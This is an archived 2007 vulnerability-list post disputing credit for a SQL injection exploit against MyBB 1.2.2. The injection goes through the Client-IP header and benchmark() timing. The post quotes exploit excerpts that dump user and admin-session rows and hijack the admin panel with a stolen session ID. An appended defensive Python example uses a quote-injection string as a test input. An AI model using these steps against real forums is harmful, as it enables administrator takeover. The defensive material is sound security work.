[VIM] Milw0rm 3719 (Mybb <= 1.2.2)
GM darkfig
gmdarkfig at gmail.com
Thu Apr 12 17:25:16 UTC 2007
The guy uses the same vulnerability I found
(http://acid-root.new.fr/poc/28070403.txt).
He uses the same method (benchmark(), Client-IP, DELETE from
prefix_sessions WHERE ip='[SQL]', and a debug mode like me :) ). It's
just the Perl version. He uses solution number 1, which I described in my
exploit:
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
# uid: 1
# username: root
# password: 39ac8681f5cf4fcd9c9c09719a618bd3
# salt: BFeJBOCF
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
# sid: 81e267263b9254f3aaf670383bfbfec9
# uid: 1
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
# ip: 127.0.0.1
# dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
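
A defender's view of the injection point named above (a client-supplied Client-IP header reaching DELETE ... WHERE ip='...'), as an added example that is not part of the original post or of MyBB's code. The table name mybb_sessions, the helper names and the sample rows are assumptions constructed for illustration, and Python with sqlite3 stands in for the forum's PHP/MySQL stack.

```python
import ipaddress
import sqlite3

def is_suspicious(header_value):
    """Detection helper: a Client-IP value that is not an IP literal is worth logging."""
    try:
        ipaddress.ip_address(header_value.strip())
        return False
    except ValueError:
        return True

def client_ip(headers, peer_addr):
    """Return a canonical IP string; fall back to the socket peer address
    when the client-supplied header is missing or not an IP literal."""
    candidate = headers.get("Client-IP", "")
    if is_suspicious(candidate):
        candidate = peer_addr
    return str(ipaddress.ip_address(candidate))

def delete_sessions(db, ip):
    """Parameterized DELETE: the value is bound, never spliced into the SQL text."""
    cur = db.execute("DELETE FROM mybb_sessions WHERE ip = ?", (ip,))
    return cur.rowcount

def demo():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE mybb_sessions (sid TEXT, ip TEXT)")  # assumed schema
    db.executemany("INSERT INTO mybb_sessions VALUES (?, ?)",
                   [("a", "127.0.0.1"), ("b", "10.0.0.5"), ("c", "10.0.0.9")])
    # Constructed header value containing a quote, as a generic test input.
    hostile = {"Client-IP": "10.0.0.5' OR '1'='1"}
    # Binding alone: the whole string is compared as a literal, so no row matches.
    bound_only = delete_sessions(db, hostile["Client-IP"])
    # Validation: the header is rejected and the peer address is used instead.
    ip = client_ip(hostile, "10.0.0.9")
    deleted = delete_sessions(db, ip)
    remaining = db.execute("SELECT COUNT(*) FROM mybb_sessions").fetchone()[0]
    return bound_only, ip, deleted, remaining

if __name__ == "__main__":
    print(demo())
```
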